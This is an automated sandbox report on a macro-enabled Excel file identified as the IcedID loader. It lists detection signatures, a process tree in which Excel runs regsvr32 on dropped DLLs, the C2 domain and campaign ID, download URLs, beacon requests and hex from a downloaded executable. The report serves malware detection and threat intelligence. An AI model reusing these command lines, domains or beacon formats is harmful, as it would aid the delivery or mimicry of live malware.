Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Formtofill4184860.xlsm

Overview

General Information

Sample Name:Formtofill4184860.xlsm
Analysis ID:444712
MD5:dd091aa318833eac4173b61caa5b6e6c
SHA1:9dc71053e2bbd11f6a2de7b1e37e9f530517da2d
SHA256:c40e0897a8c7bbd264df4fa44cc387efbc0de8e3bc834f5656f2291f920e1c5e
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2624 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 3028 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3036 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1916 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2087735512.0000000000110000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27c6:$internal_name: loader_dll_64.dll
    • 0x30b4:$string0: _gat=
    • 0x3114:$string1: _ga=
    • 0x30ec:$string2: _gid=
    • 0x30cc:$string3: _u=
    • 0x3026:$string4: _io=
    • 0x30d8:$string5: GetAdaptersInfo
    • 0x2b16:$string6: WINHTTP.dll
    • 0x27ea:$string7: DllRegisterServer
    • 0x27fc:$string8: PluginInit
    • 0x3080:$string9: POST
    • 0x3140:$string10: aws.amazon.com
    00000005.00000002.2102346921.00000000000B0000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27c6:$internal_name: loader_dll_64.dll
    • 0x30b4:$string0: _gat=
    • 0x3114:$string1: _ga=
    • 0x30ec:$string2: _gid=
    • 0x30cc:$string3: _u=
    • 0x3026:$string4: _io=
    • 0x30d8:$string5: GetAdaptersInfo
    • 0x2b16:$string6: WINHTTP.dll
    • 0x27ea:$string7: DllRegisterServer
    • 0x27fc:$string8: PluginInit
    • 0x3080:$string9: POST
    • 0x3140:$string10: aws.amazon.com
    00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000004.00000002.2094984722.0000000000110000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.regsvr32.exe.b0000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        4.2.regsvr32.exe.110000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        4.2.regsvr32.exe.2140000.4.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        5.2.regsvr32.exe.5a0000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        4.2.regsvr32.exe.110000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        Click to see the 4 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2624, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 3028

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 3.2.regsvr32.exe.110000.0.raw.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2102480631.0000000000333000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3036, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1916, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3028, type: MEMORY
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
        Source: global trafficDNS query: name: thousandsyears.download
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.225.75.73:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.111:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: astrocycle.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:47:20 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 6670Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gaVDgy0KW0G3eM%2BWXw7%2BKq7uwkVxeRBXmNvzeHfOiJR81JPQOt%2BkMZi89WwM1Mswma9SV7QUXGpaGDU58NktdKyxVHtgLwmz6ODCUbc2v7TYpJo2W%2FdkTkB8Tk0TGcx7wv8EAuI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a948cc0cf505d0-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:47:20 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 6669Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VLxfpVyZUGCWZhNkjYjM2dhqB7nvlBANFd5kfSq0gI3q0kVhzLK1Fs5Sbb7mXSadUWV7Nm8pb5flLyj6HrVr4vZxsu5Shr15CPbgy9JtmPqDwX%2FYqgPogDwLXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a948cd7e774e2b-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:47:20 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 6668Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=bnY7hfX1EQEu%2BmaCzYP0WSXCiAkbR%2BpsXJ0Ghx2e%2B6eyIicbwxoxD1SF7TGg5NolGfk0XEqm12ymQ5XePw1WcgdTgY2yGgPNEGWiqoJaw2L0qu41xuAu0QbSPMU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a948ced8672bb9-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7248:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:33323243333445413842334431384630; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7251:55; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:34323635383233383246444244423142; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7255:55; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:42393935434238304632383946363238; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: Joe Sandbox ViewIP Address: 13.225.75.73 13.225.75.73
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.225.75.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8821D41B.pngJump to behavior
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7248:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:33323243333445413842334431384630; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7251:55; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:34323635383233383246444244423142; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7255:55; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:42393935434238304632383946363238; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: thousandsyears.download
